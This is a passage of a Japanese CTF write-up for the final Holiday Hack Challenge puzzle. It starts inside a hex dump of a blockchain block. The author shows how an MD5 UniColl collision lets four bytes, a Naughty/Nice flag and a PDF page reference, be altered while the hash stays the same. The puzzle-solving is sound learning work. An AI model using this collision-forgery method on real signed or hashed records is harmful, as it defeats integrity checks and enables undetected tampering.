7d7dbbf77408abfbfae37dfdd144775f6f59eeeacbc92a842dd84463345122aced6d2fdbd0ddd6a1d00a5b3bfabb3bb774ecdeb727dabf6aa0bda337d6d12f940a97535c5edfd6d13f20572aca1695954f232fa7ed1e10a242a23f1aebe889f65f2ff475ce9443e8efd8dd3d90e8e8476077afd05cb6b54c0845131dbd0921da1b139a328c9b3a3bbbdb3b28b0bda33f1145e2be44174a7addbefeee815877bbdcdb4059660059dad89ae8d8df215c1d4d243a06fa7a6ba303d8174ad6d4dddb3750221ce8ea6eef120e44078458c740f7ee5e44b6dd20cce411101bc5b1f4f6f6edc726f77794a0dc9dfd1d035dddbdbb850179c82ab790e88a26e441f77424fabbdba37bf6dc8026eb8923571bdae84077a20b3beee9181036761c10b6f4f5447b9f2e534441dd74a24e85ee9e787fdf7e2a63e9407b7f47472f76168d45dbbaf77427b0b5ae687fb41d35866aeb6e1fa01a414508f1686f69fdbefebe78074a7acd9a0dd38428a0a2cd81be3dfbb16799bab7a32326f78862efefd8834cd8f19ebebeebe5f174f6f5a3a0b144576996e49d7dbd0964ed13a2b1180e1cb5d5d7beaf47b613aa3991162edadedf87b8f89e68025be91928eb4a24e2570502070e1c288baaa66947cb9461cb81cfc3256e8877a8f6e8975be9d9b301cddf2b9b6e1fb5af3c88ad6b37089be2a89f06144e50094a84b4672e2a5ba476816aec8e2706ca06baf794f5f5ef0e6c6ad840ea4837d98d5702af1b4907891101af28d6a3586a277d244e6e20fd94aa0ba10226df76b200ef15a49c2cc24b206b90aa0ff17b905f20abb1dc8f5cf27794b6db477a3191e652cce7b75681a52daa148d94bb044b6b91bf1d5bd8807c6d88cd6e57205b29a41bd3acccb99bec4339a20859450690ab0369629442c0ad9cf05fb6f15fe1b7d1d240065381722dc2abfc8a9cff55bbddd89240359da01859d21e2afdf508eb43becfd38780741dd47a0388e9a0b5186d556ebb1929b652aa10e5943591a0bdf552aaa62bf4b8097bec44fe766ac934653b6d5bf608a5e53e2c77a93abd0ef5dd4f258851bef4d806e8d479b905aeec1b5ba974fb699f5753b85c1fa0b85aac0fa8e35274d644a5e843a8ac8b032889dc6f172d47a93e63945bf6b15e95b30dbd4ef8dc7e049537aadaa597f6b15f9552e62951f5dd49bf0768bfbdd88740e553ac3cb36f81ea294ab5ae58ba07b1094adb8ef03df877831a653da815a5af36358e0ed0a8ec5247dc43db1570e1d38118d92bfaa8dd7a8b66531b4f6b45f19b4ed54f05ca1bc7721f1d455a8fa5d436f2483aa8a472294a23bf0d39f6d0be15d9baa87744a96d3b545b27e808d2fa8aa92395a58e534829a9a77e21c77b87aad36b304f6cb8628b8a06b37d53b6c91e2aef4056dbbd54da58668c8ab665aa3d6a4fca88f7d07c747dc63e9dd4df148dc6686ba59fa1f34eaa9b84da6b1f9528867f8ac515dfea43de7dd41e4a3c29de9cf894e6a254bf7d2a5f9c66a5842a4b0f8d8f2eea817172152e2c03289dfc5746fd303b6adad5982953650efcb7f964b9e25483d9f1d19f91a50765dca0467f6f26eaf665c56fda125b31076da0f922aefa4f83aa39e1b216e4a8b93c672ea23973e628146fecc67a82ca3340755946c7b01bf19bb0870d445d8b93a9c328d2153ea77242abdaa0830074c16e924f7c10211ba19534c32ab20224bc4b88abc5fb6aaccbf732584106916e05c257627d39c29761eef4e1770d5e9bf03a8a97062f85a21c2902780fa8f552ac9720c7ebf80df492a1350895efebb0de88f735eabd01e1f578af57eb6bb18e771201bdfc8218fd7e1934d269189f84d727419884839f40e81318fc70f843e68f130b7ccf4cbc3cc16cfaa0f583673e60cb3f00cb076020ef73ef87de8fbc1f7f7fe47d5daee53dc823bf07eb2fc797fade5df14ef3ff5af17633790747f64ef93ba17706df49bea37d07d8e6b759878f1b13c6cac7e2638363e7c6c6c726c60c832f0dbfc47cfbc580cff2a2ef45c6777ad3e983a7d9c8536079caf714137a24f20833fc28581ef53d1a78947df8a132df436bbcbe071f28f68d3f30f10023ffa0ee0193b5e145d8041bc80ad4e1c6d3ec94ef995576b81a8765c16f1f5e01bc36e1d587d751bc70cf83e43ebc02b0415acab6de0fc67b3df7faefbde9de23f76ae3b70fde3e7c3b3b7878f830f3ccfe97f73303a105bebe5ebfaf77cd429f3be86ad607d9661d7623ff8c6f6ddbdcf90d9156c9d78a443bb697fbb6af59e0cb0fda9ab538600d125a581f5bc36e62fbd8a3eccbacdeb025e4f56dc66b3c341162a4504e5e8365936f5360137b666a5cea585f84adad8baf1b5cc7ae6d58e06b5cb3d46759e35b1358f3fa9a77d77cb046d7ba061ec7ff86671a5e6e60a586058106a9c15bd430abd1d3ec08da9bad6069e682966606d0d041d21cb04c59188ba5d572d022ff9c9030830ed0c219183ed5b4d5ef5f7f463fb5657dd210da91843b9373b7cadfd2e6ed49dd9d49d2bc7d47cb2980bf0b1fbee71e525bb83e59b1b52519290caf4fc6b020c985412c7085a71ca4363c3090f0d30ff8fd58de87dfc4bfcf8fc05d030a9464f0c43f000398a2062813f86502a50ef8ed97710890f900b9770d10f94b46fa1526997b406d8e322b5fb4e0daf59fcc35eeed0a656e6473747265616d0a656e646f626a0a0a32322030206f626a0a3c3c2f4c656e677468203432362f46696c7465722f466c6174654465636f64653e3e0a73747265616d0a789c5d93cb6edb301045f7fa0a2e93452072f44a0043805f02bc681bd4c907c8d2d8155053022d2ffcf7e5cc555aa00b0987e2ccf0901aa6dbc3eee087397d0f6377e4d99c07df07be8df7d0b139f165f08923d30fddbc8cf4dd5ddb294963eef1719bf97af0e771b54ad29f71ee368787795af7e3899f93f447e8390cfe629e3eb7c7383edea7e9375fd9cfc626756d7a3ec73adfdae97b7be554b35e0e7d9c1ee6c74b4cf917f0f198d8908e1d54bab1e7dbd4761c5a7fe164656d6d564d5327ecfbffe6f20229a773f7ab0d31d4c550b26e5b47a6c8d6e66be14cb974c23938132ec01be15299ac7085dc52f855b922e137c437c26b7cd73a1b702ebc45cc9bf00efc2abc0717c20d781fd959b0e43a0707f177f02f655d07ff4a7c1cfcab4a78f1df09c3bfd418f857b296837fa935177fcd857f2e9e6e837353867fa50c7f52cf3d6274ad062c7b27f8e7f29de09f4b3cc1bf907d11fc0bd90b2dfe72ce04ff5cfe0bc1bfd09af02fc493e04f72e604ff42f645f0cf341ee79f697df867ba2efc33abcdb37489b491f4f9577b9aee1e426c4dbd0cda93d28d83e7bff7651a27c9d2e70f6db0d4a40a656e6473747265616d0a656e646f626a0a0a32332030206f626a0a3c3c2f547970652f506167652f436f6e74656e7473203136203020522f5265736f7572636573203137203020522f4d65646961426f785b30203020363132203739325d2f506172656e742032203020523e3e0a656e646f626a0a0a787265660a302032340a303030303030303030302036353533362066200a30303030303030303138203030303030206e200a30303030303030323033203030303030206e200a30303030303030323536203030303030206e200a30303030303030333039203030303030206e200a30303030303032363232203030303030206e200a30303030303032363733203030303030206e200a30303030303032373133203030303030206e200a30303030303033303932203030303030206e200a30303030303033323739203030303030206e200a30303030303136313332203030303030206e200a30303030303136363738203030303030206e200a30303030303136393933203030303030206e200a30303030303137313932203030303030206e200a30303030303236323134203030303030206e200a30303030303236363733203030303030206e200a30303030303236373731203030303030206e200a30303030303237353033203030303030206e200a30303030303237353536203030303030206e200a30303030303237353838203030303030206e200a30303030303237393234203030303030206e200a30303030303238313133203030303030206e200a30303030303339343133203030303030206e200a30303030303339393039203030303030206e200a0a747261696c65720a3c3c2f53697a652032342f526f6f742031203020523e3e0a7374617274787265660a34303030390a2525454f460abdb32e0cab036e9c7b759928eda9c2c9009285e5106ded793f2415f1ac0ee11953d7808bc3571ffc13c6833478b5e5910a1e5a1de9d875502ae3b74be6218ad8d64161699ca310aa35eb8a7a70b61782e8b7494e203ae7193b36bc462e46cc3f1f7f1d9767eb2b83b6128972a5f83b05725af43f89760d5cb6820694afd8f83b4ebedb2d323036729fa688a5fd2b43b32be004a7c7ab43611b3d7f6976c141ff99f896c48b556bcf8dc3c50d56562319d5eb426b4864213f26da893d6d43ec3e39517715f02e3941630b4d0c3c6baf4c880193ec8d21c07d86032d97df517106022db0c21c33c03402019a43'
Date: 03/24
Time: 13:21:41
PreviousHash: 4a91947439046c2dbaa96db38e924665
Data Hash to Sign: 347979fece8d403e06f89f8633b5231a
Signature: b'MJIxJy2iFXJRCN1EwDsqO9NzE2Dq1qlvZuFFlljmQ03+erFpqqgSI1xhfAwlfmI2MqZWXA9RDTVw3+aWPq2S0CKuKvXkDOrX92cPUz5wEMYNfuxrpOFhrK2sks0yeQWPsHFEV4cl6jtkZ//OwdIznTuVgfuA8UDcnqCpzSV9Uu8ugZpAlUY43Y40ecJPFoI/xi+VU4xM0+9vjY0EmQijOj5k89/AbMAD2R3UbFNmmR61w7cVLrDhx3XwTdY2RCc3ovnUYmhgPNnduKIUA/zKbuu95FFi5M2r6c5Mt6F+c9EdLza24xX2J4l3YbmagR/AEBaF9EBMDZ1o5cMTMCtHfw=='
b10b4a6bd373b61f32f4fd3a0cdfbf84
実行すると1011個目のデータが改ざんされたらしい。内容は一つはわけのわからないdataファイル。もう一つはPDFファイルとなっている。
ファイルを書き出すと下のようになり、Jackは素晴らしいとほめたたえている。これはおかしい。
ヒントにはMD5衝突のスライドとGitHubが紹介されているので見てみる。
ハッシュの特性ですが、二つの異なるデータのハッシュ値が同じとき、その二つのデータに、ある文字列をそれぞれ加えてもハッシュ値は同一となるという性質があります。Githubにもありますが、下記の通り。
hash(A) = hash(B) -> hash(A + C) = hash(B + C)
今回は4byte変更すればいいとのことなので、その中のテクニックを見てみると、Unicollというものが2byteの書き換えでMD5が一緒になるらしい。
そこでGithubのPDFの攻撃の部分を読むとPDFの構造とコメントを細工することでUnicollができることがわかる。
PDF-parserで見てみると、参照するページの後に変なコメントが挿入されていることがわかる。そして複数のページが仕込まれており、2を3に変更して、そのあとのコメントの適切な1byteを書き換えればよさそう。
obj 1 0
Type: /Catalog
Referencing: 2 0 R
<<
/Type /Catalog
/_Go_Away /Santa
/Pages '2 0 R 0\xf9\xd9\xbfW\x8e<\xaa\xe5\rx\x8f\xe7`\xf3\x1dd\xaf\xaa\x1e\xa1\xf2\xa1=cu>\x1a\xa5\xbf\x80bO\xc3F\xbf\xd6g\xca\xf7I\x95\x91\xc4\x02\x01\xed\xab\x03\xb9\xef\x95\x99\x1c[I\x9f\x86\xdc\x859\x85\x90\x99\xadT\xb0\x1es?\xe5\xa7\xa4\x89\xb92\x95\xffTh\x03MIy8\xe8\xf9\xb8\xcb:\xc3\xcfP\xf0\x1b2[\x9b\x17tu\x95B+sx\xf0%\x02\xe1\xa9\xb0\xac\x85(\x01z\x9e'
>>
obj 2 0
Type: /Pages
Referencing: 23 0 R
<<
/Type /Pages
/Count 1
/Kids [23 0 R]
>>
obj 3 0
Type: /Pages
Referencing: 15 0 R
<<
/Type /Pages
/Count 1
/Kids [15 0 R]
>>
書き換えた後で見てみるとPDFの中身が変わる。Jack悪い奴という文章になる。
ただこれでは4バイト中の2バイトのみ、あとの2バイトを探す。
いろいろヒント見ながら探してたら、ブロックの中のSign: 1 (Nice)の部分がおかしいということに気づく。JackがPDFの内容を変えるとよいというのはおかしく、これを0 (Naughty)にする必要がある。
ここを0に変化させ、MD5が合うようにUnicoll通りにデータを変更する。これで変更する4バイトが見つかるわけだが、私はvimでバイナリデータ変更したら、うまくいかなかった。vimで%!xxdを使うと、最後に改行を入れられるせい....
最終的に差分はこのようになった。
MD5も衝突したのであとはsha256sumで計算して終わり。
$ sha256sum col.dat fff054f33c2134e0230efb29dad515064ac97aa8c68d33c58c01213a0d408afb col.dat
このUnicoll、細工したバイナリデータの10バイト目を1増やすか、減らすだけで同じデータが作れるというのは結構衝撃。
この問題を解いた後、サンタの部屋に行くと、閉じられていた奥の部屋に行けるようになっていた。
Jackに話しかけると、どうやらJackは刑務所に行く模様。
奥へ行きサンタに話しかけるとスタッフロールが流れ始める。
完走した感想
まったくもって知らない領域でもヒントを頼りに解くことができるし、いろいろ勉強になるなという感想。
特にUnicoll周りは、それ以外にもハッシュ衝突のテクニックがあるらしく、まだまだ勉強できそう。
あとWriteupは解きながら作るといいです。全部解き終わった後に作り始めたら思い出しながら書くとか、自分のメモがあてにならなくて後悔しました。
最初に書いたようにHoliday Hack Challengeは今からでも解くことはできるので、面白そうと思った方はぜひ!!
